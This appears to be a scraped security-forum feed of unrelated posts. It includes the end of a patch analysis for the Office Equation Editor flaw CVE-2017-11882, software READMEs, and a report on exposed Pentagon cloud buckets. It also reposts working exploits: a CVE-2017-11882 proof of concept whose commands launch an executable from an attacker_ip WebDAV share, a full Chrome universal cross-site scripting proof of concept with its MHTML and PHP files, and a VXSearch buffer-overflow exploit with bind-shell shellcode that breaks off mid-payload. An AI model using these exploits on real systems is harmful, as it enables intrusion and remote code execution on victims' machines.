43B418, the patched function temporarily stores some value - which it will need later on - in ebx instead of a local stack-based variable, which releases enough bytes for injecting the push call. (By the way, addievidence of manual patching is that while the local variable is no longer used, space for it is still made on the stack; otherwise sub esp, 0x10C would turn into sub esp, 0x108.) For the other caller, function at address 4181FA, the patched function mysteriously has the push instruction injected without any other modifications to the code that would introduce the needed extra space. As you can see on the above image, the push instruction is injected at the beginning of the yellow block, and all original instructions in that block are pushed down 5 bytes. But why does this not overwrite 5 bytes of the original code somewhere else? It's as if there were 5 or more unused bytes already in existence just after this block of code that the patcher could safely overwrite. To solve this mystery, let's look at the code in its text form. Surprise, the vulnerable version actually had an extra jmp loc_418318 instruction at the end of the modified code block. How convenient! This allows the code in this block to be moved down 5 bytes, making space for the push instruction at the top. Coincidence? Perhaps, but it looks an awful lot like this code block got manually modified before in the past, whereby it got shortened for 5 bytes and its last instruction (jmp loc_418318) was left there. Additional Security Checks What we've covered so far was related to Embedi's published research and CVE-2017-11882. Their described buffer overflow would now be prevented by checking for the destination buffer length. But the new version of EQNEDT32.EXE has two additional modified functions at addresses 41160F and 4219F0. Let's have a look at them. In the patched executable, these two functions got a bunch of injected boundary checks for copying to what appear to be 0x20-byte buffers. These checks all look the same: ecx (which is the counter for copying) is compared to 0x21; if it's greater than or equal to that, ecx gets set to 0x20. All these checks are injected right before inlined memcpy operations. Let's look at one of them to see how the patcher made room for the additional instructions. As shown on the above image, a check is injected before the inlined memcpy code. Note that in 32-bit code, memcpy is typically implemented by first copying blocks of 4 bytes using the movsd (move double word) instruction, while any remaining bytes are then copied using movsb (move byte). This is efficient in terms of performance, but whoever was patching this noticed that some space can be freed by only using movsb, and perhaps sacrificing a nanosecond or two. After doing so, the code remained logically identical but now there was space for injecting the check before it, as well as for zero-terminating the copied string. Again, an impressive and clever hack (and there was still an extra byte to spare - notice the nop?) There are six such length checks in two modified functions, and since they don't seem to be related to fixing CVE-2017-11882, we believe that Microsoft noticed some additional attack vectors that could also cause a buffer overflow and decided to proactively patch them. Final Touches After patching the vulnerable code and effectively manually building a new version of Equation Editor, the patcher also corrected the version number of EQNEDT32.EXE to 2017.8.14.0, and the TimeDateStamp in the PE header to August 14, 2017 (hex value 5991FA38) - which is just 10 days after Microsoft acknowledged receipt of Embedi's report. (Note however that due to the manual nature of setting these values it's possible that code has been modified after that date.) [Update 11/20/2017] Another thing Microsoft also patched in EQNEDT32.EXE was the "ASLR bit", i.e., they set the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag in the PE optional header structure: This is good. Enabling ASLR on EQNEDT32.EXE will make it harder to exploit any remaining memory corruption vulnerabilities. For instance, Embedi's exploit would not work with ASLR because it relied on the fact that the call to WinExec would always be present at the same memory address; this allowed them to simply put that address on stack and wait for the ret to do all the work. Interestingly, Microsoft decided not to also set the IMAGE_DLLCHARACTERISTICS_NX_COMPAT ("DEP") flag, which would prevent code execution from data pages (e.g., from stack). They surely had good reasons, but should any additional vulnerabilities be found and exploited in EQNEDT32.EXE, the exploit will likely include execution of data on stack or heap. [End update 11/20/2017] Conclusion Maintaining a software product in its binary form instead of rebuilding it from modified source code is hard. We can only speculate as to why Microsoft used the binary patching approach, but being binary patchers ourselves we think they did a stellar job. This old Equation Editor is now under the spotlight, and many researchers are likely to start fuzzing it for additional vulnerabilities. If any are found, we'll probably see additional rounds of manual binary patches in EQNEDT32.EXE. While Office has had a new Equation Editor integrated since at least version 2007, Microsoft can't simply remove EQNEDT32.EXE (the old Equation Editor) from Office as there are probably tons of old documents out there containing equations in this old format, which would then become un-editable. Now how would we micropatch CVE-2017-11882 with 0patch? It would actually be much easier: we wouldn't have to shrink existing code to make room for the injected one, because 0patch makes sure that we get all the space we need. So we wouldn't have to come up with clever hacks like de-optimizing memcpy or finding an alternative place to temporarily store a value for later use. This freedom and flexibility makes developing an in-memory micropatch much easier and quicker than in-file patching, and we believe software vendors like Microsoft could benefit greatly from using in-memory micropatching for fixing critical vulnerabilities. Oh by the way, Microsoft also updated Office's wwlib.dll this Patch Tuesday, prompting us to port our DDE / DDEAUTO patches to these new versions. 0patch Agent running on your computer will automatically download and apply these new patches without interrupting you. If you don't have 0patch Agent installed yet, we have good news for you: IT'S FREE! Just download, install and register, and you're all set. Cheers! @mkolsek @0patch P.S.: If you happen to know the person(s) who did the binary patching of EQNEDT32.EXE, please send them a link to this blog post. We'd like them to know how much we admire their work. Thanks! Source
-
- cve-2017-11882
- 3a0acebf
- (and 8 more)
-
Microsoft Office - OLE Remote Code Execution Exploit CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882 Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html DEMO PoC exploitation: webdav_exec CVE-2017-11882 A simple PoC for CVE-2017-11882. This exploit triggers WebClient service to start and execute remote file from attacker-controlled WebDav server. The reason why this approach might be handy is a limitation of executed command length. However with help of WebDav it is possible to launch arbitrary attacker-controlled executable on vulnerable machine. This script creates simple document with several OLE objects. These objects exploits CVE-2017-11882, which results in sequential command execution. The first command which triggers WebClient service start may look like this: cmd.exe /c start \\attacker_ip\ff Attacker controlled binary path should be a UNC network path: \\attacker_ip\ff\1.exe Usage webdav_exec_CVE-2017-11882.py -u trigger_unc_path -e executable_unc_path -o output_file_name Sample exploit for CVE-2017-11882 (starting calc.exe as payload) example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability and runs calculator in the system. Download: CVE-2017-11882-master.zip or git clone https://github.com/embedi/CVE-2017-11882.git Mirror: webdav_exec_CVE-2017-11882.py Source
-
- 3
-
- cve-2017-11882
- microsoft office
-
(and 3 more)
Tagged with:
-
React Chartkick Create beautiful charts with one line in React See it in action Supports Chart.js, Google Charts, and Highcharts Charts Line chart <LineChart data={{"2013-02-10 00:00:00 -0800": 11, "2013-02-11 00:00:00 -0800": 6}} /> Pie chart <PieChart data={[["Blueberry", 44], ["Strawberry", 23]]} /> Column chart <ColumnChart data={[["Sun", 32], ["Mon", 46], ["Tue", 28]]} /> Bar chart <BarChart data={[["Work", 32], ["Play", 1492]]} /> Area chart <AreaChart data={{"2013-02-10 00:00:00 -0800": 11, "2013-02-11 00:00:00 -0800": 6}} /> Scatter chart <ScatterChart data={[[174.0, 80.0], [176.5, 82.3], [180.3, 73.6], [167.6, 74.1], [188.0, 85.9]]} /> Geo chart - Google Charts <GeoChart data={[["United States", 44], ["Germany", 23], ["Brazil", 22]]} /> Timeline - Google Charts <Timeline data={[["Washington", "1789-04-29", "1797-03-03"],["Adams", "1797-03-03", "1801-03-03"]]} /> Multiple series data = [ {"name":"Workout", "data": {"2013-02-10 00:00:00 -0800": 3, "2013-02-17 00:00:00 -0800": 4}}, {"name":"Call parents", "data": {"2013-02-10 00:00:00 -0800": 5, "2013-02-17 00:00:00 -0800": 3}} ]; // and <LineChart data={data} /> Say Goodbye to Timeouts Make your pages load super fast and stop worrying about timeouts. Give each chart its own endpoint. <LineChart data="/stocks" /> Options Id, width, and height <LineChart id="users-chart" width="800px" height="500px" /> Min and max values <LineChart min={1000} max={5000} /> min defaults to 0 for charts with non-negative values. Use null to let the charting library decide Colors <LineChart colors={["#b00", "#666"]} /> Stacked columns or bars <ColumnChart stacked={true} /> Discrete axis <LineChart discrete={true} /> Label (for single series) <LineChart label="Value" /> Axis titles <LineChart xtitle="Time" ytitle="Population" /> Straight lines between points instead of a curve <LineChart curve={false} /> Show or hide legend <LineChart legend={true} /> Specify legend position <LineChart legend="bottom" /> Donut chart <PieChart donut={true} /> Refresh data from a remote source every n seconds <LineChart refresh={60} /> You can pass options directly to the charting library with: <LineChart library={{backgroundColor: "#eee"}} /> See the documentation for Google Charts, Highcharts, and Chart.js for more info. Data Pass data as an array or object <PieChart data={{"Blueberry": 44, "Strawberry": 23}} /> <PieChart data={[["Blueberry", 44], ["Strawberry", 23]]} /> Times can be a Date, a timestamp, or a string (strings are parsed) <LineChart data={[[new Date(), 5], [1368174456, 4], ["2013-05-07 00:00:00 UTC", 7]]} /> Download Charts Chart.js only Give users the ability to download charts. It all happens in the browser - no server-side code needed. <LineChart download={true} /> Set the filename <LineChart download="boom" /> Note: Safari will open the image in a new window instead of downloading. Installation Run npm install chartkick react-chartkick --save And import the chart types you want import { LineChart, PieChart } from 'react-chartkick'; Chart.js npm install chart.js --save And add window.Chart = require('chart.js'); Google charts Include <script src="https://www.gstatic.com/charts/loader.js"></script> Highcharts Run npm install highcharts --save And add window.Highcharts = require('highcharts'); Without NPM Include the charting library <script src="https://unpkg.com/chart.js@2.7.1/dist/Chart.bundle.js"></script> And then the Chartkick libraries <script src="https://unpkg.com/chartkick@2.2.4"></script> <script src="dist/react-chartkick.js"></script> Contribuiting Everyone is encouraged to help improve this project. Here are a few ways you can help: Report bugs Fix bugs and submit pull requests Write, clarify, or fix documentation Suggest or add new features Download react-chartkick-master.zip or git clone https://github.com/ankane/react-chartkick.git Source: https://github.com/ankane/react-chartkick
-
Cryptocurrency price ticker CLI. Check cryptocurrencies' prices, changes on your console. Best CLI tool for those who are both Crypto investors and Engineers. All data comes from coinmarketcap.com APIs. Install In order to use coinmon, make sure that you have Node version 6.0.0 or higher. $ npm install -g coinmon Usage To check the top 10 cryptocurrencies ranked by their market cap, simply enter $ coinmon Options You can use the -c (or --convert) with the fiat currency symbol to find in terms of another currency. The default currency is USD and it supports AUD, BRL, CAD, CHF, CLP, CNY, CZK, DKK, EUR, GBP, HKD, HUF, IDR, ILS, INR, JPY, KRW, MXN, MYR, NOK, NZD, PHP, PKR, PLN, RUB, SEK, SGD, THB, TRY, TWD, ZAR. $ coinmon -c eur // convert prices to Eurodollars $ coinmon -c jpy // convert prices to the Japanese yen You can use the -f (or --find) with keyword to search cryptocurrencies. $ coinmon -f btc // search coins included keyword btc $ coinmon -f eth // search coins included keyword eth You can use the -t (or --top) with the index to find the top n cryptocurrencies ranked by their market cap. $ coinmon --top 50 // find top 50 $ coinmon --top 1000 // find top 1000 Screenshot Development It's simple to run coinmon on your local computer. The following is step-by-step instruction. $ git clone https://github.com/bichenkk/coinmon.git $ cd coinmon $ yarn $ npm install -g $ npm link $ coinmon License MIT Download: coinmom-master.zip or git clone https://github.com/bichenkk/coinmon.git Source
-
The UpGuard Cyber Risk Team can now disclose that three publicly downloadable cloud-based storage servers exposed a massive amount of data collected in apparent Department of Defense intelligence-gathering operations. The repositories appear to contain billions of public internet posts and news commentary scraped from the writings of many individuals from a broad array of countries, including the United States, by CENTCOM and PACOM, two Pentagon unified combatant commands charged with US military operations across the Middle East, Asia, and the South Pacific. The data exposed in one of the three buckets is estimated to contain at least 1.8 billion posts of scraped internet content over the past 8 years, including content captured from news sites, comment sections, web forums, and social media sites like Facebook, featuring multiple languages and originating from countries around the world. Among those are many apparently benign public internet and social media posts by Americans, collected in an apparent Pentagon intelligence-gathering operation, raising serious questions of privacy and civil liberties. While a cursory examination of the data reveals loose correlations of some of the scraped data to regional US security concerns, such as with posts concerning Iraqi and Pakistani politics, the apparently benign nature of the vast number of captured global posts, as well as the origination of many of them from within the US, raises serious concerns about the extent and legality of known Pentagon surveillance against US citizens. In addition, it remains unclear why and for what reasons the data was accumulated, presenting the overwhelming likelihood that the majority of posts captured originate from law-abiding civilians across the world. With evidence that the software employed to create these data stores was built and operated by an apparently defunct private-sector government contractor named VendorX, this cloud leak is a striking illustration of just how damaging third-party vendor risk can be, capable of affecting even the highest echelons of the Pentagon. The poor CSTAR cyber risk scores of CENTCOM and PACOM - 542 and 409, respectively, out of a maximum of 950 - is a further indication that even the most sensitive intelligence organizations are not immune to sizable cyber risk. Finally, the collection of billions of internet posts in several unsecured data repositories raises further questions about online privacy, as well as regarding the right to freely express your beliefs online. The Discovery On September 6th, 2017, UpGuard Director of Cyber Risk Research Chris Vickery discovered three Amazon Web Services S3 cloud storage buckets configured to allow any AWS global authenticated user to browse and download the contents; AWS accounts of this type can be acquired with a free sign-up. The buckets’ AWS subdomain names - “centcom-backup,” “centcom-archive,” and “pacom-archive” - provide an immediate indication of the data repositories’ significance. CENTCOM refers to the US Central Command, based in Tampa, Fla. and responsible for US military operations from East Africa to Central Asia, including the Iraq and Afghan Wars. PACOM is the US Pacific Command, headquartered in Aiea, HI and covering East, South, and Southeast Asia, as well as Australia and Pacific Oceania. There are further clues as to the provenance of these data stores. A “Settings” table in the bucket “centcom-backup” indicates the software was operated by employees of a company called VendorX, complete with a listing of the details of a number of developers with access. While public information about this firm is scant, an internet search reveals multiple individuals who worked for VendorX describing work building Outpost for CENTCOM and the Defense Department: Descriptions of VendorX’s work on Outpost, via employee LinkedIn pages. This external reference to “Outpost” as a Pentagon social engineering effort built by VendorX appears to be corroborated by the contents of “centcom-backup,” which, besides, the references to VendorX in the “Settings” table, contains a folder titled “outpost.” Within this folder is the development configurations and API for Outpost, and while this content’s exact relationship to the “Outpost” program described on former employees' profiles remains unclear, some indication of its purpose may be provided by a number of very large compressed files also within the bucket. Decompressed, these files are revealed to contain Lucene indexes, a search engine used to easily look for search terms throughout massive amounts of data, including keywords, partial words, and combinations of words, in a number of different languages. These Lucene indexes, which are optimized to interact with Elasticsearch, seem to parse internet content similar to that contained in the other buckets. Taken together, this disparate collection of data appears to constitute an ingestion engine for the bulk collection of internet posts - organizing a mass quantity of data into a searchable form. The former employee's reference to “high-risk youth in unstable regions of the world” is further corroborated by an examination of another folder within “centcom- backup.” This folder, titled “scraped,” contains an enormous amount of XML files consisting of internet content “scraped” from the public internet since 2009 to 2015; the other CENTCOM bucket, “archive,” would be found to contain more such data, collected from 2009 to the present day. With a number of information fields describing the origins, nature, contents, and web address of the post, thousands of examples of such scraped content are listed in plaintext - a smaller example of the massive stores of such data contained in the other two buckets. Screencaps of sample posts, with information fields visible. Also contained in “scraped,” however, is a folder titled “Coral,” which likely refers to the US Army’s “Coral Reef” intelligence software. This folder contains a directory named “INGEST” that contained all the posts scraped and held in the “centcom-backup” bucket. The Coral Reef program “allows users of intelligence to better understand relationships between persons of interest” as a component of the Distributed Common Ground System-Army (DCGS-A) intelligence suite, “the Army's primary system for the posting of data, processing of information, and dissemination to all components and echelons of intelligence, surveillance and reconnaissance information about the threats, weather, and terrain” programs. Such a focus on gathering intelligence about “persons of interest” would be even more clear-cut in the other two buckets, starting with “centcom-archive.” The bucket “centcom-archive” contains more scraped internet posts stored in the same XML text file format as seen in “centcom-backup,” only on a much larger scale: conservatively, at least 1.8 billion such posts are stored here. This vast repository ingested content from a broad array of webpages; while Facebook is a popular, recurring host, everything from soccer discussion groups to video game forums are sources for scraped web posts. The posts themselves are in many different languages, but with an emphasis on Arabic, Farsi (spoken in Iran and Afghanistan), and a number of Central and South Asian dialects spoken in Afghanistan and Pakistan. The most recent indexed files were created in August 2017, right before UpGuard’s discovery, consisting of posts collected in February 2017. Not present are any Lucene index files of the sort seen in “centcom-backup” - the contents of this bucket are purely the input (or, perhaps, also the output) of an internet-scouring machine. There are few indications as to the level of importance afforded to these posts. Given the CENTCOM buckets’ focus on the collection and organization of millions of internet posts, largely from the Middle East and South Asia - a focus that would certainly also be of interest to a program like Coral Reef - it is perhaps unsurprising to see hints at why some of these posts would be of significance. Arabic posts criticizing or mocking ISIS, posted to Facebook pages for Iraqi anti-jihadi groups, or Pashto language comments made on the official Facebook page of Pakistani politician Imran Khan, who has drawn scrutiny from both the Taliban and the US government, give some indication of content that might be of interest to CENTCOM in its prosecution of regional wars and against Islamic extremists. The bucket “pacom-archive” is very similar to the contents and structure of “centcom-archive,” but skews toward Southeast and East Asian posts, as well as some by Australians. Taken together, the buckets “centcom-archive” and “pacom-archive” appear to store raw ingested (or even possibly raw egested) internet content on a massive scale, perhaps to be run through text extraction programming. This data’s relationship to the searchable Lucene indexes discovered in “centcom-backup” remains unclear. Taken together, however, the data suggests that there is well-crafted interplay between the “Coral” social media and commentary scraping project, an ingestion engine dubbed “Thor,” and a public-influence initiative referred to as “Outpost.”. The Significance The collection methods used to build these data stores remains somewhat murky, even as the general purpose of the mass collection seems clear, mirroring known US defense efforts to monitor the internet for violent radicalism. Why, for instance, were each of these posts collected? What triggered their inclusion in these repositories? Massive in scale, it is difficult to state exactly how or why these particular posts were collected over the course of almost a decade. Given the enormous size of these data stores, a cursory search reveals a number of foreign-sourced posts that either appear entirely benign, with no apparent ties to areas of concern for US intelligence agencies, or ones that originate from American citizens, including a vast quantity of Facebook and Twitter posts, some stating political opinions. Among the details collected are the web addresses of targeted posts, as well as other background details on the authors which provide further confirmation of their origins from American citizens. It remains unclear on what basis this data was collected. What is more clear is the significance of these data repositories’ contents.The collection of public internet posts in massive repositories by the Defense Department for unclear reasons is one matter; the lack of care taken to secure them is another. The CENTCOM and PACOM CSTAR cyber risk scores of 542 and 409 provide some indication of gaps in the armor of two major military organizations’ digital defenses. The possible misuse or exploitation of this data, perhaps against internet users in foreign countries wracked by civil violence, is a troubling possibility, as is the presence of US citizens’ internet content in buckets associated with US military intelligence operations. The Posse Comitatus Act restricts the military from “ being used as a tool for law enforcement, except in situations of explicit national emergency based on express authorization from Congress,” but as seen in recent years, this separation has been eroded. Despite all of this, the same issues of cyber risk driving insecurity across the landscape are present here, too. A simple permission settings change would have meant the difference between these data repositories being revealed to the wider internet, or remaining secured. If critical information of a highly sensitive nature cannot be secured by the government - or by third-party vendors entrusted with the information - the consequences will affect not only whatever government organizations and contractors that are responsible, but anybody whose information or internet posts were targeted through this program, potentially resulting in unfair bias or unwarranted actions against the post creator. Source
-
- 1
-
- pacom-archive
- centcom
-
(and 3 more)
Tagged with:
-
instaleaza mixerul PulseAudio Volume Control si seteaza output-ul speakers
-
Catching malicious phishing domain names using certstream SSL certificates live stream. This is just a working PoC, feel free to contribute and tweak the code to fit your needs Installation The script should work fine using Python2 or Python3. You will need the following python packages installed: certstream, tqdm, entropy, termcolor, tld, python_Levenshtein pip install -r requirements.txt Usage $ ./catch_phishing.py Example phishing caught License GNU GPLv3 Download: phishing_catcher-master.zip Source
-
- 1
-
A set of 170+ Bootstrap based design blocks ready to be used to create clean modern websites. https://www.froala.com/design-blocks Froala Design Blocks Over 170 responsive design blocks ready to be used in your web or mobile apps. All blocks are based on the Bootstrap Library, and they are the building blocks for beautiful websites. Discuss it on Product Hunt Explore Design Blocks » WYSIWYG HTML Editor · Pages · Blog · Download Table of contents Quick start What's included? Bugs and feature requests Dependencies Categories Browser support Community Development Contributors Copyright and license Quick start Several quick start options are available: Download the latest release. Clone the repo: git clone https://github.com/froala/design-blocks.git Install with npm: npm install froala-design-blocks What's included Within the download archive you'll find the following directories and files, logically grouping common assets and providing both compiled and minified variations. You'll see something like this: design-blocks/ ├── dist/ │ ├── css/ │ │ ├── froala_blocks.css │ │ └── froala_blocks.min.css │ └── imgs/ │ │── call_to_action.html │ │── contacts.html │ │── contents.html │ │── features.html │ │── footers.html │ │── forms.html │ │── headers.html │ │── index.html │ │── pricings.html │ │── teams.html │ └── testimonials.html ├── psds/ ├── screenshots/ └── src/ We provide compiled CSS (froala_blocks.css), as well as compiled and minified CSS (froala_blocks.min.css). Also, in the downloaded archive you will find useful images and PSD files that you can use to create new backgrounds. In the screenshots folder, there are the screenshots of all design blocks. Bugs and feature requests Have a bug or a feature request? Please first read the issue guidelines and search for existing and closed issues. If your problem or idea is not addressed yet, please open a new issue. Dependencies Bootstrap. Froala Design Blocks is built on Bootstrap 4 library and fully supports it. It uses the Javascript files only for the header design blocks, so if you don't need them, we recommend not to include the Bootstrap JS files in order to reduce your bundle size. Font Awesome. We're using the amazing Font Awesome library for the social network icons. Google Fonts. By default, the Design Blocks toolkit is built using the Roboto font, however that can easily be changed to other fonts. Categories Call to action - https://github.com/froala/design-blocks/blob/master/dist/call_to_action.html Contacts - https://github.com/froala/design-blocks/blob/master/dist/contacts.html Contents - https://github.com/froala/design-blocks/blob/master/dist/contents.html Features - https://github.com/froala/design-blocks/blob/master/dist/features.html Footers - https://github.com/froala/design-blocks/blob/master/dist/footers.html Forms - https://github.com/froala/design-blocks/blob/master/dist/forms.html Headers - https://github.com/froala/design-blocks/blob/master/dist/headers.html Pricings - https://github.com/froala/design-blocks/blob/master/dist/pricings.html Teams - https://github.com/froala/design-blocks/blob/master/dist/teams.html Testimonials - https://github.com/froala/design-blocks/blob/master/dist/testimonials.html Browser Support At the moment, we aim to support all major web browsers. Any issue in the browsers listed below should be reported as a bug: Internet Explorer 10+ Microsoft Edge 14+ Safari 6+ Firefox (Current - 1) and Current versions Chrome (Current - 1) and Current versions Opera (Current - 1) and Current versions Safari iOS 7.0+ Android 6.0+ (Current - 1) and Current means that we support the current stable version of the browser and the version that precedes it. Community Get updates on Froala Design Blocks' development and chat with the project maintainers and community members: Follow @froala on Twitter Read and subscribe to The Official Froala Blog Check the Official Website Join us on Facebook Google+ Pinterest Development Get code git clone git@github.com:froala/design-blocks.git cd design-blocks Install dependencies and run project npm install npm run gulp Contribuitors Special thanks to everyone who contributed to getting the Froala Design Blocks to the current state. Shourav Chowdhury - source of inspiration for the images Copyright and license Code and documentation copyright 2017 Froala Labs. Code released under the Froala Open Web Design License. Sources: https://www.froala.com/design-blocks https://github.com/froala/design-blocks
-
- html5
- bootstrap4
-
(and 3 more)
Tagged with:
-
Google Chrome versions prior to 62 universal cross site scripting proof of concept exploit. Download CVE-2017-5124-master.zip Content: PoC.mht PoC.php README.md Mirror: README.md # CVE-2017-5124 ### UXSS with MHTML DEMO: https://bo0om.ru/chrome_poc/PoC.php (tested on Chrome/61.0.3163.100) PoC.php <?php $filename=realpath("PoC.mht"); header( "Content-type: multipart/related"); readfile($filename); ?> PoC.mht MIME-Version: 1.0 Content-Type: multipart/related; type="text/html"; boundary="----MultipartBoundary--" CVE-2017-5124 ------MultipartBoundary-- Content-Type: application/xml; <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE catalog [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <xsl:stylesheet id="stylesheet" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="*"> <html><iframe style="display:none" src="https://google.com"></iframe></html> </xsl:template> </xsl:stylesheet> ------MultipartBoundary-- Content-Type: text/html Content-Location: https://google.com <script>alert('Location origin: '+location.origin)</script> ------MultipartBoundary---- Source
-
- 2
-
- cve-2017-5124
- google chrome
- (and 4 more)
-
#!/usr/bin/env python # # Exploit Title : VXSearch v10.2.14 Local SEH Overflow # Date : 11/16/2017 # Exploit Author : wetw0rk # Vendor Homepage : http://www.flexense.com/ # Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe # Version : 10.2.14 # Tested on : Windows 7 (x86) # Description : VX Search v10.2.14 suffers from a local buffer overflow. The # following exploit will generate a bind shell on port 1337. I # was unable to get a shell working with msfvenom shellcode so # below is a custom alphanumeric bind shell. Greetz rezkon ;) # # trigger the vulnerability by : # Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name # import struct shellcode = "w00tw00t" shellcode += ( "\x25\x4a\x4d\x4e\x55" # and eax, 0x554e4d4a "\x25\x35\x32\x31\x2a" # and eax, 0x2a313235 "\x2d\x6a\x35\x35\x35" # sub eax, 0x3535356a "\x2d\x65\x6a\x6a\x65" # sub eax, 0x656a6a65 "\x2d\x61\x64\x4d\x65" # sub eax, 0x654d6461 "\x50" # push eax "\x5c" # pop esp ) shellcode += ( "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4f\x4f\x4f\x4f" "\x2d\x4f\x30\x4f\x68\x2d\x62\x2d\x62\x72\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x76\x57\x57\x63\x2d\x77\x36\x39" "\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x54" "\x54\x54\x2d\x25\x54\x7a\x2d\x2d\x25\x52\x76\x36\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x35\x49\x49\x2d\x49" "\x25\x49\x69\x2d\x64\x25\x72\x6c\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x70\x33\x33\x25\x2d\x70\x25\x70\x25\x2d" "\x4b\x6a\x56\x39\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x79\x55\x75\x32\x2d\x79\x75\x75\x55\x2d\x79\x77\x77\x78" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x4a\x4a" "\x25\x2d\x39\x5f\x4d\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x4b\x57\x4b\x57\x2d\x70\x76\x4b\x79\x2d\x70\x76" "\x78\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49" "\x49\x49\x49\x2d\x49\x4e\x64\x49\x2d\x78\x25\x78\x25\x2d\x6f" "\x25\x7a\x48\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x58\x58\x38\x58\x2d\x58\x30\x32\x58\x2d\x51\x46\x2d\x47\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5f\x52\x5f\x5f" "\x2d\x5f\x25\x25\x35\x2d\x62\x39\x25\x25\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x4a\x4a\x4a\x4a\x2d\x4a\x4a\x4a" "\x4a\x2d\x79\x39\x4a\x79\x2d\x6d\x32\x4b\x68\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x30\x71\x30\x2d\x30\x25" "\x71\x30\x2d\x38\x31\x51\x5f\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x32\x32\x32\x32\x2d\x78\x77\x7a\x77\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x62\x62\x62\x62\x2d" "\x48\x57\x47\x4f\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x76\x76\x4f\x4f\x2d\x36\x39\x5a\x5a\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x61\x61\x61\x61\x2d\x4a\x61\x4a" "\x25\x2d\x45\x77\x53\x35\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x63\x63\x63\x63\x2d\x39\x63\x63\x2d\x2d\x32\x63" "\x7a\x25\x2d\x31\x49\x7a\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x72\x79\x79\x79\x2d\x25\x30\x25\x30\x2d\x25" "\x32\x25\x55\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x58\x58\x41\x58\x2d\x58\x58\x25\x77\x2d\x6e\x51\x32\x69\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x48\x77\x38\x48" "\x2d\x4e\x76\x6e\x61\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x41\x41\x6e\x6e\x2d\x31\x31\x30\x6e\x2d\x37\x36\x30" "\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x38\x38" "\x38\x38\x2d\x38\x79\x38\x25\x2d\x38\x79\x38\x25\x2d\x58\x4c" "\x73\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x61" "\x52\x61\x52\x2d\x37\x4a\x31\x49\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x4d\x47\x4d\x4d\x2d\x30\x25\x4d\x6b\x2d" "\x36\x32\x66\x71\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x36\x43\x43\x6c\x2d\x33\x54\x47\x25\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x4c\x4c\x4c\x4c\x2d\x6e\x4c\x6e" "\x36\x2d\x65\x67\x6f\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x25\x25\x4b\x4b\x2d\x25\x25\x6f\x4b\x2d\x4e\x41" "\x59\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41" "\x41\x41\x41\x2d\x52\x52\x78\x41\x2d\x6e\x6c\x70\x25\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x6c\x30\x30\x2d" "\x30\x6c\x6c\x30\x2d\x38\x70\x79\x66\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x42\x70\x70\x45\x2d\x32\x45\x70\x31" "\x2d\x25\x4b\x49\x31\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x25\x50\x50\x50\x2d\x25\x7a\x72\x25\x2d\x4e\x73\x61" "\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x77" "\x74\x74\x2d\x61\x78\x35\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x30\x30\x30\x30\x2d\x30\x30\x59\x30\x2d\x30" "\x30\x74\x51\x2d\x6b\x36\x79\x67\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x75\x38\x43\x43\x2d\x7a\x31\x43\x43\x2d" 